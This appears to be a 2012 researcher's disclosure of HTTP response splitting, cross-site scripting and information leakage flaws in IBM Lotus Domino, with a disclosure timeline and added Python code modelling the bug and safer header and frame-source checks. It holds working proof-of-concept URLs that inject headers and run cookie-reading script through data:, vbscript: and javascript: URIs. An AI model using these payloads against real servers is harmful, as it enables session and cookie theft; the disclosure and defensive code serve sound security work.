HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
2012-09-20 11:58
I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. On 15 August 2012 IBM released an advisory concerning these vulnerabilities.
CVE ID: CVE-2012-3301.
-------------------------
Affected products:
-------------------------
IBM Lotus Domino 8.5.3 and earlier versions are vulnerable. These vulnerabilities will be fixed in Domino 8.5.4; IBM is still working on the other vulnerabilities I have informed them about.
For fixes, workarounds and mitigations, see the IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160
----------
Details:
----------
HTTP Response Splitting (WASC-25):
http://site/servlet/%0AHeader:value%0A1
The percent-encoded line feeds (%0A) in the path are reflected into the response headers, so the attacker-supplied "Header:value" line reaches the browser as a header of its own. Any header the attacker can set this way (Refresh, Location, Set-Cookie) becomes an attack vector.
Cross-Site Scripting (WASC-08):
Works in various browsers (in Mozilla Firefox only in versions before Firefox 3.0.9):
http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1
Works in all versions of Firefox, but without access to cookies:
http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1
The Location header can also be used for an XSS attack (it has its own nuances in different browsers).
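As an added example (not code from the advisory or from IBM): a Python model of the split above. It assumes a server that copies the decoded request path into a Location header, which is a guess at the shape of the bug rather than Domino's code; the hardened builder refuses control characters, and the parser shows how a lenient client reads the injected line as a separate header. PROBE_PATH, the build_* functions and the sample responses are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed from the advisory's probe URL: %0A is a percent-encoded line feed.
PROBE_PATH = "/servlet/%0AHeader:value%0A1"


def build_probe(header_name: str, header_value: str) -> str:
    """Build a /servlet/ probe path that tries to inject one extra header.
    The header value is passed raw, exactly as in the advisory's URLs."""
    return f"/servlet/%0A{header_name}:{header_value}%0A1"


def build_response_vulnerable(request_path: str) -> bytes:
    """Assumed vulnerable behaviour (a model, not Domino's code): the decoded
    request path is copied into a Location header with no check for CR or LF,
    so each %0A turns into a line break inside the header block."""
    decoded = unquote(request_path)
    head = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: http://site{decoded}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return head.encode("latin-1")


def build_response_hardened(request_path: str) -> bytes:
    """Hardened form: a header value must never contain CR, LF or NUL.
    The request is refused rather than the bytes being stripped, so a
    malformed target cannot silently become a different attacker-chosen one."""
    decoded = unquote(request_path)
    if re.search(r"[\r\n\x00]", decoded):
        raise ValueError("control character in header value")
    head = (
        "HTTP/1.1 302 Found\r\n"
        f"Location: http://site{decoded}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return head.encode("latin-1")


def parse_headers(raw: bytes) -> list:
    """Parse the header block the way a lenient browser does: a bare LF ends
    a header line just like CRLF, which is why %0A alone suffices for the split."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = []
    for line in re.split(r"\r?\n", head)[1:]:  # [1:] skips the status line
        name, sep, value = line.partition(":")
        if sep:  # lines without a colon (the trailing "1") are not headers
            headers.append((name.strip().lower(), value.strip()))
    return headers


def injected_header_present(raw: bytes, name: str, value: str) -> bool:
    """True if the probe's name/value pair shows up as a header of its own."""
    return (name.lower(), value) in parse_headers(raw)


if __name__ == "__main__":
    vuln = build_response_vulnerable(PROBE_PATH)
    print(injected_header_present(vuln, "Header", "value"))  # True
    refresh = build_probe("Refresh", "0;URL=javascript:with(document)alert(cookie)")
    print(parse_headers(build_response_vulnerable(refresh)))
    try:
        build_response_hardened(PROBE_PATH)
    except ValueError as exc:
        print("hardened server refused:", exc)
```

Against a live target the same parse_headers check can be run over the raw bytes of the real response; if the injected name/value pair appears as a separate header, the server is splitting.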
Cross-Site Scripting (WASC-08):
The attack is possible via data: and vbscript: URIs passed in the Src parameter of the frameset:
http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
In x.nsf, "x" stands for the username of the logged-in user.
------------
Timeline:
------------
The full timeline can be read in the first advisory (http://securityvulns.ru/docs28474.html).
- During 16.05-20.05 I wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I sent five advisories via the contact form at IBM's site.
- On 31.05 I resent the five advisories to IBM PSIRT, which they received and said they would forward to the developers (of Lotus products).
- On 15.08 IBM released their advisory (about the Cross-Site Scripting and HTTP Response Splitting holes, just a few of the total number of holes).
- On 28.08.2012 I disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).
XSS (WASC-08):
In March 2008 this XSS worked as follows:
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//
Since then the attack vector via javascript: URI has been fixed (it is quite possible that my German client informed IBM in 2008 about the multiple holes I found in Domino). But an attack via data: and vbscript: URIs is still possible:
https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
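As an added example covering both the mail frameset Src parameter above and the help database framesets here (not code from the advisory or from IBM): a Python allowlist check for a frame Src value, beside a model of the javascript:-only denylist whose effect the advisory describes, showing why data: and vbscript: URIs, and a tab-prefixed or mixed-case javascript: URI, still pass the denylist. The Src values, the own_host placeholder "site", and all function names are constructed for this example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote, urlparse

# Constructed from the advisory's URLs plus a few variants: Src values an
# attacker would pass to ?OpenFrameSet&Frame=...&Src=... (percent-encoded as in the URL).
ATTACK_SRCS = [
    "javascript:alert(document.cookie);//",
    "data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B",
    "vbscript:MsgBox(document.cookie)",       # constructed: vbscript: variant
    "%09javascript:alert(document.cookie)",   # constructed: tab before the scheme
    "JaVaScRiPt:alert(document.cookie)",      # constructed: mixed case
    "http://evil.example/phish",              # constructed: frame pointed off-site
]

# Legitimate frame sources (constructed, modelled on the advisory's paths).
BENIGN_SRCS = [
    "NotesView",
    "/help/lccon.nsf/Topic?OpenDocument",
    "https://site/help/help85_admin.nsf/Main",
]


def src_allowed_denylist(src: str) -> bool:
    """Models the effect the advisory attributes to the 2008 fix (not IBM's
    code): only a literal javascript: prefix is refused."""
    return not src.lower().startswith("javascript:")


# Bytes a browser's URL parser drops or ignores before it reads the scheme.
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)


def _browser_view(src: str) -> str:
    """Percent-decode once and strip ignored bytes, so the check sees the
    string the same way the browser will, not the way it arrived."""
    return _IGNORED.sub("", unquote(src))


def extract_scheme(src: str) -> Optional[str]:
    """Scheme a browser would see for this Src, or None for a relative path."""
    match = _SCHEME.match(_browser_view(src))
    return match.group(1).lower() if match else None


def src_allowed_allowlist(src: str, own_host: str = "site") -> bool:
    """Allowlist check: accept a same-origin relative path or an http(s) URL
    on own_host; refuse every other scheme (data:, vbscript:, javascript:, ...)
    and protocol-relative or backslash forms that would leave the origin."""
    cleaned = _browser_view(src)
    if cleaned.startswith("//") or "\\" in cleaned:
        return False
    match = _SCHEME.match(cleaned)
    if match is None:
        return True  # relative path inside the same origin
    if match.group(1).lower() not in ("http", "https"):
        return False
    return urlparse(cleaned).hostname == own_host


def denylist_bypasses(srcs: List[str]) -> List[str]:
    """Inputs the javascript:-only check lets through but the allowlist refuses."""
    return [s for s in srcs if src_allowed_denylist(s) and not src_allowed_allowlist(s)]


if __name__ == "__main__":
    for src in denylist_bypasses(ATTACK_SRCS):
        print("denylist misses:", src, "-> scheme", extract_scheme(src))
```

The decode-then-strip step matters: a check that inspects the raw query string sees "%09javascript:" and lets it pass, while the browser sees "javascript:". Checking the scheme after normalisation, and allowing only what the frameset actually needs, closes the data: and vbscript: vectors together with any scheme added later.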
Information Leakage (WASC-13):
The page https://site/domcfg.nsf, which is accessible without authentication, leaks information about the web server configuration. I have seen this situation on many Lotus Domino sites.